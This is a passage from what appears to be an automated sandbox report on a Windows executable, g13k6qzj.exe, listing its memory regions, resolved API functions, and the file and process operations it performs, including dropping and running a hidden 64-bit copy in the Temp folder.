| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | os_pid = 0x5c0, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:47:54 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #132: g13k6qzj.exe
179
0
| Information | Value |
|---|---|
| ID | #132 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:43, Reason: Child Process |
| Unmonitor | End Time: 00:02:53, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3a8 |
| Parent PID | 0x40 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E20
0x
BD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x008f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00a80fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x01e8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x73d90000 | 0x73e21fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | - |
